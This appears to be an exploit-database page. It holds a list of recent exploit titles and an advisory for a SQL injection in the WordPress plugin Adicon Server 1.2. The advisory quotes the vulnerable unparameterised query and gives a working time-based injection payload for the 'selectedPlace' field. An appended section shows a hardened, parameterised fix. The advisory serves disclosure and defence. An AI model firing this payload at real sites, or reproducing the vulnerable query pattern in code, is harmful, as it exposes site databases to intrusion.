
12 changes to exploits/shellcodes

EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)
NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)
WebKit JSC - 'AbstractValue::set' Use-After-Free
WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write
Ayukov NFTP FTP Client 2.0 - Buffer Overflow
Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)
Hashicorp Consul - Remote Command Execution via Services API (Metasploit)
WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection
Frog CMS 0.9.5 - Cross-Site Scripting
ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)
WSTMart 2.0.8 - Cross-Site Scripting
ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)
WSTMart 2.0.8 - Cross-Site Scripting
FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection
Craft CMS 3.0.25 - Cross-Site Scripting
bludit Pages Editor 3.0.0 - Arbitrary File Upload
WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
bludit Pages Editor 3.0.0 - Arbitrary File Upload
WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
Vtiger CRM 7.1.0 - Remote Code Execution
18 lines
No EOL
576 B
Text
# Exploit Title: WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection
# Date: 2018-12-28
# Software Link: https://wordpress.org/plugins/adicons/
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Version: 1.2
# Category: webapps

# SQL Injection
# File: addIcon.php
# Vulnerable code:
# $placement=$_POST['selectedPlace'];

# $x=explode("_",$placement);
# $ck=$wpdb->get_row("select id from ".$table_prefix."adicons where adRow=".$x[0]." and adCol=".$x[1]);

# Example payload:
selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD); -- -
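
The vulnerable lines above concatenate both halves of 'selectedPlace' into the query unquoted and unvalidated. The following is an added example, not code from the plugin or from the advisory author: one way to harden that lookup by strictly parsing the "row_col" value and binding both parts as integers with $wpdb->prepare(). The function names adicons_parse_place and adicons_find_icon are hypothetical, and the use of $wpdb->prefix for the table name is an assumption.

```php
<?php
// Added example (not the plugin's code): hardened handling of 'selectedPlace'.

/**
 * Parse a "row_col" value strictly. Hypothetical helper name.
 * Returns [row, col] as ints, or null when the input is malformed.
 */
function adicons_parse_place($raw): ?array
{
    // Anchored pattern: digits only, exactly one underscore, bounded length.
    if (!is_string($raw) || !preg_match('/\A(\d{1,9})_(\d{1,9})\z/', $raw, $m)) {
        return null;
    }
    return [(int) $m[1], (int) $m[2]];
}

/**
 * Same lookup as the vulnerable query, with both values bound as integers.
 * $wpdb is the WordPress database object; $place comes from adicons_parse_place().
 */
function adicons_find_icon($wpdb, array $place)
{
    $table = $wpdb->prefix . 'adicons'; // assumed table naming, prefix from WordPress
    return $wpdb->get_row(
        $wpdb->prepare(
            "SELECT id FROM {$table} WHERE adRow = %d AND adCol = %d",
            $place[0],
            $place[1]
        )
    );
}

// Stand-alone check of the parser (CLI only, so it is inert inside WordPress).
// Inputs are constructed, except the last, which is the payload quoted above.
if (PHP_SAPI === 'cli') {
    $samples = [
        '2_3',
        '1',
        '1_2_3',
        '1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD); -- -',
    ];
    foreach ($samples as $s) {
        $p = adicons_parse_place($s);
        $result = $p === null ? 'rejected' : "row={$p[0]} col={$p[1]}";
        echo str_pad($s, 52), ' => ', $result, PHP_EOL;
    }
}
```

In addIcon.php the caller would reject the request when the parser returns null instead of falling through to the query.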